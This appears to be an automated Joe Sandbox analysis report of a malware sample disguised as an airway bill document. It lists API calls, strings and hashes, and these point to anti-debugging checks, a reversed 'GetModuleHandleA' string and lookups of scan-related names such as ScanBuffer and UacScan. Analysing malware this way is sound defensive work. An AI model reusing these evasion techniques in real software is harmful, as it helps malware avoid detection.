                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 02B2AA4C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                                                                    • String ID:
                                                                                                    • API String ID: 4102113445-0
                                                                                                    • Opcode ID: a202f69da43f37349ba956e40217c894746d713e8073df507476f02ab382b793
                                                                                                    • Instruction ID: a5f4c26f98753ecec4e842a52e2aa809cce7e888cf180a585b60fe8a573c8895
                                                                                                    • Opcode Fuzzy Hash: a202f69da43f37349ba956e40217c894746d713e8073df507476f02ab382b793
                                                                                                    • Instruction Fuzzy Hash: 7201F7316403786BF702B6748D12FAE735DDF46B20F9101E0F62CA6A94D6249E0C8A68
                                                                                                    Function 02B4BE4A Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B23538: GetKeyboardType.USER32(00000000), ref: 02B2353D
                                                                                                      • Part of subcall function 02B23538: GetKeyboardType.USER32(00000001), ref: 02B23549
                                                                                                    • GetCommandLineA.KERNEL32 ref: 02B4C06C
                                                                                                    • GetACP.KERNEL32 ref: 02B4C080
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02B4C08A
                                                                                                      • Part of subcall function 02B23568: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B2358A
                                                                                                      • Part of subcall function 02B23568: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B235D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235BD
                                                                                                      • Part of subcall function 02B23568: RegCloseKey.ADVAPI32(?,02B235E0,00000000,?,00000004,00000000,02B235D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235D3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
                                                                                                    • String ID: ()o
                                                                                                    • API String ID: 3316616684-1347693928
                                                                                                    • Opcode ID: 30211bde1758b2fed10c1403161e81695cd3e2fdc00584dfb45b8a65b0cadce2
                                                                                                    • Instruction ID: 91f0d0c4e3d5c144bcd8ed875747b4d74fa2539a981557b57b73cf4cf6e7f338
                                                                                                    • Opcode Fuzzy Hash: 30211bde1758b2fed10c1403161e81695cd3e2fdc00584dfb45b8a65b0cadce2
                                                                                                    • Instruction Fuzzy Hash: 381182B4C953A08ED312AF74619A2493F75AF13388B085CDDC5884F253E738811ECF66
                                                                                                    Function 02B2AA80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,02B2AC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B2AAAF
                                                                                                      • Part of subcall function 02B2A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A762
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Locale$InfoThread
                                                                                                    • String ID: eeee$ggg$yyyy
                                                                                                    • API String ID: 4232894706-1253427255
                                                                                                    • Opcode ID: b750038e9c89debfc4cee12a1f2013b4bcb7ad13777f4659e02d22528c5655cd
                                                                                                    • Instruction ID: 19d47aabf594e3cf978a46fec59b86228c00f9641e24902e1f6034792b09de02
                                                                                                    • Opcode Fuzzy Hash: b750038e9c89debfc4cee12a1f2013b4bcb7ad13777f4659e02d22528c5655cd
                                                                                                    • Instruction Fuzzy Hash: 7C41F2313043394BD701AB688C907BEB3FBDB85200B5455E5A47ED7714EA68E90DCA21
                                                                                                    Function 02B38018 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc
                                                                                                    • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                    • API String ID: 1883125708-1952140341
                                                                                                    • Opcode ID: 611439da5fda73215915846b13a337ff9c093b8236d7d987a482c0b456fcc2fb
                                                                                                    • Instruction ID: 67369ba15b2ef030814d666a6cc287ed0db5d5708a1517ed16dd016d4c00d9c1
                                                                                                    • Opcode Fuzzy Hash: 611439da5fda73215915846b13a337ff9c093b8236d7d987a482c0b456fcc2fb
                                                                                                    • Instruction Fuzzy Hash: 07F09071650308BFEB02EFA8DC5195E77BEEB49B40B9149E0F508D3A10DA30AE14DA22
                                                                                                    Function 02B3EB8C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(KernelBase,?,02B3EF90,UacInitialize,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString), ref: 02B3EB92
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02B3EBA4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: IsDebuggerPresent$KernelBase
                                                                                                    • API String ID: 1646373207-2367923768
                                                                                                    • Opcode ID: 26a03fe9f57e4a343732b95ce0c2763a0328db9ae733b17bc54e3a23e9f858f7
                                                                                                    • Instruction ID: 4efd73a15327f5f74c5022468ea0d1c43ab416030ceddd4617969965212bb60a
                                                                                                    • Opcode Fuzzy Hash: 26a03fe9f57e4a343732b95ce0c2763a0328db9ae733b17bc54e3a23e9f858f7
                                                                                                    • Instruction Fuzzy Hash: A0D012713513601DF9037AF40CC4C9E23CD8F0552D7200EE2B027D10E1F966C8195511
                                                                                                    Function 02B2C3F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,02B4C10B,00000000,02B4C11E), ref: 02B2C3FA
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02B2C40B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                    • API String ID: 1646373207-3712701948
                                                                                                    • Opcode ID: f2a80324dfd80789de8712b32feac9ddc1184fbd5b72273787e003245f3874fd
                                                                                                    • Instruction ID: 2b1bf4ae431757d57b119d2465ed539047aab8329ff5b202203a6556dcdb15a9
                                                                                                    • Opcode Fuzzy Hash: f2a80324dfd80789de8712b32feac9ddc1184fbd5b72273787e003245f3874fd
                                                                                                    • Instruction Fuzzy Hash: 1FD05E79A403724AF700AFB168C163F2BC8A714785F0558E6F01D57101D7B1441C4F56
                                                                                                    Function 02B2E168 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B2E217
                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B2E233
                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B2E2AA
                                                                                                    • VariantClear.OLEAUT32(?), ref: 02B2E2D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 920484758-0
                                                                                                    • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                    • Instruction ID: 5e5334e8bcb318eabf8c51893ae59f510fa7dcc4444bf11d1c945759e12d8e69
                                                                                                    • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                    • Instruction Fuzzy Hash: 6441E775A003399BCB61DB59CC90BD9B3BDEF49205F0042E5E64DA7215DA30EF888F64
                                                                                                    Function 02B2ACBC Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2ACD9
                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2ACFD
                                                                                                    • GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD18
                                                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2ADAE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3990497365-0
                                                                                                    • Opcode ID: 5c7d029f37b619222101338d6ce81cc880e5b12ac0401df6e131c6cdf36d84ad
                                                                                                    • Instruction ID: cf617d44c66255a356b58c6b4d9fde1f39eaabb5289a385741597e4b54eb6d4f
                                                                                                    • Opcode Fuzzy Hash: 5c7d029f37b619222101338d6ce81cc880e5b12ac0401df6e131c6cdf36d84ad
                                                                                                    • Instruction Fuzzy Hash: DC410971A403689BDB21EB68CC84BDAB7FDAB08341F0444E5A64CE7245DB749F898F50
                                                                                                    Function 02B2ACBA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2ACD9
                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2ACFD
                                                                                                    • GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD18
                                                                                                    • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2ADAE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3990497365-0
                                                                                                    • Opcode ID: 6cb2393a1fe9958aa3a44a8da3819f56690c7d57dcbfb0e0f14c908b18193348
                                                                                                    • Instruction ID: 6b6e94098aae8ed03a493fe9e1b9b7019eaaa9732113d55a8b5385f4a11af88a
                                                                                                    • Opcode Fuzzy Hash: 6cb2393a1fe9958aa3a44a8da3819f56690c7d57dcbfb0e0f14c908b18193348
                                                                                                    • Instruction Fuzzy Hash: CE411871A403689BDB21EB68CC84BDAB7FDAB08341F0404E5A64CE7245DB74AF8D8F50
                                                                                                    Function 02B21C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 946857dcb933822409bca6afe2e70c9e6fd5c4f4945d42e3ee3e795b048f24fc
                                                                                                    • Instruction ID: b4b5eaaae65d75ed8967f4af1fe44883c9f3919e991df1f14feb89b47892d704
                                                                                                    • Opcode Fuzzy Hash: 946857dcb933822409bca6afe2e70c9e6fd5c4f4945d42e3ee3e795b048f24fc
                                                                                                    • Instruction Fuzzy Hash: 3FA1E8767317244BE718EA7C9C803ADB386DBC4265F1842FEE52DCB387DB64C9498650
                                                                                                    Function 02B2946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02B2955A), ref: 02B294F2
                                                                                                    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02B2955A), ref: 02B294F8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DateFormatLocaleThread
                                                                                                    • String ID: yyyy
                                                                                                    • API String ID: 3303714858-3145165042
                                                                                                    • Opcode ID: 0972061e0d9b2ed601e2c39bbdb534eda00e997dfa74db4ef33f8498be0e050d
                                                                                                    • Instruction ID: 9d1cbbf1408f96dddcd1da2e1f7642d657ac21fd6c49c1a600ac0a5599dcdba9
                                                                                                    • Opcode Fuzzy Hash: 0972061e0d9b2ed601e2c39bbdb534eda00e997dfa74db4ef33f8498be0e050d
                                                                                                    • Instruction Fuzzy Hash: 10214871A007389FDB11DFA8C841AAEB3BDEF09710F6100E6E94DE7651D6349E48CAA5
                                                                                                    Function 02B38184 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
                                                                                                      • Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A
                                                                                                      • Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                      • Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B3820E), ref: 02B381F0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                    • String ID: FlushInstructionCache$Kernel32
                                                                                                    • API String ID: 3811539418-184458249
                                                                                                    • Opcode ID: 32eec884ed6b14f541f9d469b161884c9a881a05f8b0b60313e9e03fea32d17b
                                                                                                    • Instruction ID: 6cf90b896b93ff660f3034bd11dd4324f15742d64e29f41b7a1fc2a00ec1096f
                                                                                                    • Opcode Fuzzy Hash: 32eec884ed6b14f541f9d469b161884c9a881a05f8b0b60313e9e03fea32d17b
                                                                                                    • Instruction Fuzzy Hash: E9016D75650704BFEB02EFA8DC41F5A77ADEB48B10F5184A0B508E7A40D634AD14CA21
                                                                                                    Function 02B26444 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocValue
                                                                                                    • String ID: Pyq
                                                                                                    • API String ID: 1189806713-1241674935
                                                                                                    • Opcode ID: 19dc40705e774793db41613219259b414d9bb1183889fa99e42f087d3072a950
                                                                                                    • Instruction ID: 77c502de16b857a573282862e186b95491de997d97a6a4e3b3603ef08c64cf2b
                                                                                                    • Opcode Fuzzy Hash: 19dc40705e774793db41613219259b414d9bb1183889fa99e42f087d3072a950
                                                                                                    • Instruction Fuzzy Hash: 8CC002B4E40322CAEF01BBB99544A093BDDEB04385F049DA5B468C7148EB35D41DDF54
                                                                                                    Function 02B3AD5C Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AD90
                                                                                                    • IsBadWritePtr.KERNEL32(?,00000004), ref: 02B3ADC0
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000008), ref: 02B3ADDF
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3ADEB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Read$Write
                                                                                                    • String ID:
                                                                                                    • API String ID: 3448952669-0
                                                                                                    • Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                                                                                                    • Instruction ID: af0077796bfbd479a69f6cb7f1f1febcd90d632b3f413e8c0751cdb26ecd95e3
                                                                                                    • Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
